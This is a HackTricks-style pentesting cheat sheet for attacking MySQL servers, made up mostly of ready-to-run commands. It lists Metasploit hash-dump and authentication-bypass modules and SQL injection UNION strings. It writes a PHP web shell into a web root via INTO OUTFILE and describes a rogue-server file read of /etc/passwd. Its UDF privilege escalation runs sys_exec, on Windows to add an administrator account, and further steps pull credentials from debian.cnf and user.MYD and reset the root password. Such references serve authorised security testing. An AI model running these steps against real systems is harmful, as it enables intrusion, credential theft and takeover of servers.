HackTricks
Search…
Pentesting
Powered By GitBook
3306 - Pentesting Mysql

Basic Information

MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL). _**_From here.
Default port: 3306
1
3306/tcp open mysql
Copied!

Connect

Local

1
mysql -u root # Connect to root without password
2
mysql -u root -p # A password will be asked (check someone)
Copied!

Remote

1
mysql -h <Hostname> -u root
2
mysql -h <Hostname> -u [email protected]
Copied!

Enumeration

Some of the enumeration actions require valid credentials
1
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
2
msf> use auxiliary/scanner/mysql/mysql_version
3
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
4
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
5
msf> use auxiliary/admin/mysql/mysql_enum #Creds
6
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
7
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
Copied!

Write any binary data

1
CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
2
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)
Copied!

Basic & interesting MySQL commands

1
show databases;
2
use <database>;
3
show tables;
4
describe <table_name>;
5
6
select grantee, table_schema, privilege_type FROM schema_privileges; #Exact privileges
7
select user,file_priv from mysql.user where user='root'; #File privileges
8
select version(); #version
9
select @@version(); #version
10
select user(); #User
11
select database(); #database name
12
13
#Try to execute code
14
select do_system('id');
15
\! sh
16
17
#Basic MySQLi
18
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
19
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"
20
21
#Read & Write
22
select load_file('/var/lib/mysql-files/key.txt'); #Read file
23
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'
24
25
#Try to change MySQL root password
26
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
27
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
28
FLUSH PRIVILEGES;
29
quit;
Copied!
1
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
2
mysql -u root -h 127.0.0.1 -e 'show databases;'
Copied!

MySQL arbitrary read file by client

Actually, when you try to load data local into a table the content of a file the MySQL or MariaDB server asks the client to read it and send the content. Then, if you can tamper a mysql client to connect to your own MyQSL server, you can read arbitrary files. Please notice that this is the behaviour using:
1
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
Copied!
(Notice the "local" word) Because without the "local" you can get:
1
mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
2
3
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
Copied!
Initial PoC: https://github.com/allyshka/Rogue-MySql-Server In this paper you can see a complete description of the attack and even how to extend it to RCE: https://paper.seebug.org/1113/ Here you can find an overview of the attack: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

POST

Mysql User

It will be very interesting if mysql is running as root:
1
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
Copied!

Privilege escalation

How to:
    Current Level of access
      mysql>select user();
      mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
    Access passwords
      mysql> use mysql
      mysql> select user,password from user;
    Create a new user and grant him privileges
      mysql>create user test identified by 'test';
      mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
    Break into a shell
      mysql> \! cat /etc/passwd
      mysql> \! bash

Privilege Escalation via library

You can find compiled versions of this libraries in sqlmap: locate lib_mysqludf_sys.so and locate lib_mysqludf_sys.dllInstead of locate you can also use whereis to search for this libraries inside the host.

Linux

1
use mysql;
2
create table npn(line blob);
3
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
4
select * from npn into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
5
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
6
select sys_exec('id > /tmp/out.txt');
Copied!

Windows

1
USE mysql;
2
CREATE TABLE npn(line blob);
3
INSERT INTO npn values(load_files('C://temp//lib_mysqludf_sys.dll'));
4
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
5
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
6
SELECT sys_exec("net user npn npn12345678 /add");
7
SELECT sys_exec("net localgroup Administrators npn /add");
Copied!

Extracting MySQL credentials from the database

1
SELECT User,Host,Password FROM mysql.user;
2
SELECT User,Host,authentication_string FROM mysql.user;
Copied!
1
mysql -u root --password=<PASSWORD> -e "SELECT User,Host,authentication_string FROM mysql.user;"
Copied!

Extracting MySQL credentials from files

Inside /etc/mysql/debian.cnf you can find the plain-text password of the user debian-sys-maint
1
cat /etc/mysql/debian.cnf
Copied!
You can use these credentials to login in the mysql database.
Inside the file: /var/lib/mysql/mysql/user.MYD you can find all the hashes of the MySQL users (the ones that you can extract from mysql.user inside the database).
You can extract them doing:
1
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
Copied!

Enabling logging

You can enable logging of mysql queries inside /etc/mysql/my.cnf uncommenting the following lines:

Useful files

Configuration Files
    windows
        config.ini
        my.ini
          windows\my.ini
          winnt\my.ini
        <InstDir>/mysql/data/
      unix
        my.cnf
          /etc/my.cnf
          /etc/mysql/my.cnf
          /var/lib/mysql/my.cnf
          ~/.my.cnf
          /etc/my.cnf
    Command History
      ~/.mysql.history
    Log Files
      connections.log
      update.log
      common.log

Default MySQL Database/Tables

information_schema
mysql
performance_schema
sys
ALL_PLUGINS APPLICABLE_ROLES CHARACTER_SETS CHECK_CONSTRAINTS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES ENABLED_ROLES ENGINES EVENTS FILES GLOBAL_STATUS GLOBAL_VARIABLES KEY_COLUMN_USAGE KEY_CACHES OPTIMIZER_TRACE PARAMETERS PARTITIONS PLUGINS PROCESSLIST PROFILING REFERENTIAL_CONSTRAINTS ROUTINES SCHEMATA SCHEMA_PRIVILEGES SESSION_STATUS SESSION_VARIABLES STATISTICS SYSTEM_VARIABLES TABLES TABLESPACES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS INNODB_LOCKS INNODB_TRX INNODB_SYS_DATAFILES INNODB_FT_CONFIG INNODB_SYS_VIRTUAL INNODB_CMP INNODB_FT_BEING_DELETED INNODB_CMP_RESET INNODB_CMP_PER_INDEX INNODB_CMPMEM_RESET INNODB_FT_DELETED INNODB_BUFFER_PAGE_LRU INNODB_LOCK_WAITS INNODB_TEMP_TABLE_INFO INNODB_SYS_INDEXES INNODB_SYS_TABLES INNODB_SYS_FIELDS INNODB_CMP_PER_INDEX_RESET INNODB_BUFFER_PAGE INNODB_FT_DEFAULT_STOPWORD INNODB_FT_INDEX_TABLE INNODB_FT_INDEX_CACHE INNODB_SYS_TABLESPACES INNODB_METRICS INNODB_SYS_FOREIGN_COLS INNODB_CMPMEM INNODB_BUFFER_POOL_STATS INNODB_SYS_COLUMNS INNODB_SYS_FOREIGN INNODB_SYS_TABLESTATS GEOMETRY_COLUMNS SPATIAL_REF_SYS CLIENT_STATISTICS INDEX_STATISTICS USER_STATISTICS INNODB_MUTEXES TABLE_STATISTICS INNODB_TABLESPACES_ENCRYPTION user_variables INNODB_TABLESPACES_SCRUBBING INNODB_SYS_SEMAPHORE_WAITS
columns_priv column_stats db engine_cost event func general_log gtid_executed gtid_slave_pos help_category help_keyword help_relation help_topic host index_stats innodb_index_stats innodb_table_stats ndb_binlog_index plugin proc procs_priv proxies_priv roles_mapping server_cost servers slave_master_info slave_relay_log_info slave_worker_info slow_log tables_priv table_stats time_zone time_zone_leap_second time_zone_name time_zone_transition time_zone_transition_type transaction_registry user
accounts cond_instances events_stages_current events_stages_history events_stages_history_long events_stages_summary_by_account_by_event_name events_stages_summary_by_host_by_event_name events_stages_summary_by_thread_by_event_name events_stages_summary_by_user_by_event_name events_stages_summary_global_by_event_name events_statements_current events_statements_history events_statements_history_long events_statements_summary_by_account_by_event_name events_statements_summary_by_digest events_statements_summary_by_host_by_event_name events_statements_summary_by_program events_statements_summary_by_thread_by_event_name events_statements_summary_by_user_by_event_name events_statements_summary_global_by_event_name events_transactions_current events_transactions_history events_transactions_history_long events_transactions_summary_by_account_by_event_name events_transactions_summary_by_host_by_event_name events_transactions_summary_by_thread_by_event_name events_transactions_summary_by_user_by_event_name events_transactions_summary_global_by_event_name events_waits_current events_waits_history events_waits_history_long events_waits_summary_by_account_by_event_name events_waits_summary_by_host_by_event_name events_waits_summary_by_instance events_waits_summary_by_thread_by_event_name events_waits_summary_by_user_by_event_name events_waits_summary_global_by_event_name file_instances file_summary_by_event_name file_summary_by_instance global_status global_variables host_cache hosts memory_summary_by_account_by_event_name memory_summary_by_host_by_event_name memory_summary_by_thread_by_event_name memory_summary_by_user_by_event_name memory_summary_global_by_event_name metadata_locks mutex_instances objects_summary_global_by_type performance_timers prepared_statements_instances replication_applier_configuration replication_applier_status replication_applier_status_by_coordinator replication_applier_status_by_worker replication_connection_configuration replication_connection_status replication_group_member_stats replication_group_members rwlock_instances session_account_connect_attrs session_connect_attrs session_status session_variables setup_actors setup_consumers setup_instruments setup_objects setup_timers socket_instances socket_summary_by_event_name socket_summary_by_instance status_by_account status_by_host status_by_thread status_by_user table_handles table_io_waits_summary_by_index_usage table_io_waits_summary_by_table table_lock_waits_summary_by_table threads user_variables_by_thread users variables_by_thread
host_summary host_summary_by_file_io host_summary_by_file_io_type host_summary_by_stages host_summary_by_statement_latency host_summary_by_statement_type innodb_buffer_stats_by_schema innodb_buffer_stats_by_table innodb_lock_waits io_by_thread_by_latency io_global_by_file_by_bytes io_global_by_file_by_latency io_global_by_wait_by_bytes io_global_by_wait_by_latency latest_file_io memory_by_host_by_current_bytes memory_by_thread_by_current_bytes memory_by_user_by_current_bytes memory_global_by_current_bytes memory_global_total metrics processlist ps_check_lost_instrumentation schema_auto_increment_columns schema_index_statistics schema_object_overview schema_redundant_indexes schema_table_lock_waits schema_table_statistics schema_table_statistics_with_buffer schema_tables_with_full_table_scans schema_unused_indexes session session_ssl_status statement_analysis statements_with_errors_or_warnings statements_with_full_table_scans statements_with_runtimes_in_95th_percentile statements_with_sorting statements_with_temp_tables sys_config user_summary user_summary_by_file_io user_summary_by_file_io_type user_summary_by_stages user_summary_by_statement_latency user_summary_by_statement_type version wait_classes_global_by_avg_latency wait_classes_global_by_latency waits_by_host_by_latency waits_by_user_by_latency waits_global_by_latency x$host_summary x$host_summary_by_file_io x$host_summary_by_file_io_type x$host_summary_by_stages x$host_summary_by_statement_latency x$host_summary_by_statement_type x$innodb_buffer_stats_by_schema x$innodb_buffer_stats_by_table x$innodb_lock_waits x$io_by_thread_by_latency x$io_global_by_file_by_bytes x$io_global_by_file_by_latency x$io_global_by_wait_by_bytes x$io_global_by_wait_by_latency x$latest_file_io x$memory_by_host_by_current_bytes x$memory_by_thread_by_current_bytes x$memory_by_user_by_current_bytes x$memory_global_by_current_bytes x$memory_global_total x$processlist x$ps_digest_95th_percentile_by_avg_us x$ps_digest_avg_latency_distribution x$ps_schema_table_statistics_io x$schema_flattened_keys x$schema_index_statistics x$schema_table_lock_waits x$schema_table_statistics x$schema_table_statistics_with_buffer x$schema_tables_with_full_table_scans x$session x$statement_analysis x$statements_with_errors_or_warnings x$statements_with_full_table_scans x$statements_with_runtimes_in_95th_percentile x$statements_with_sorting x$statements_with_temp_tables x$user_summary x$user_summary_by_file_io x$user_summary_by_file_io_type x$user_summary_by_stages x$user_summary_by_statement_latency x$user_summary_by_statement_type x$wait_classes_global_by_avg_latency x$wait_classes_global_by_latency x$waits_by_host_by_latency x$waits_by_user_by_latency x$waits_global_by_latency

HackTricks Automatic Commands

1
Protocol_Name: MySql #Protocol Abbreviation if there is one.
2
Port_Number: 3306 #Comma separated if there is more than one.
3
Protocol_Description: MySql #Protocol Abbreviation Spelled out
4
5
Entry_1:
6
Name: Notes
7
Description: Notes for MySql
8
Note: |
9
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
10
11
https://book.hacktricks.xyz/pentesting/pentesting-mysql
12
13
Entry_2:
14
Name: Nmap
15
Description: Nmap with MySql Scripts
16
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306
17
18
Entry_3:
19
Name: MySql
20
Description: Attempt to connect to mysql server
21
Command: mysql -h {IP} -u {Username}@localhost
Copied!
Last modified 2mo ago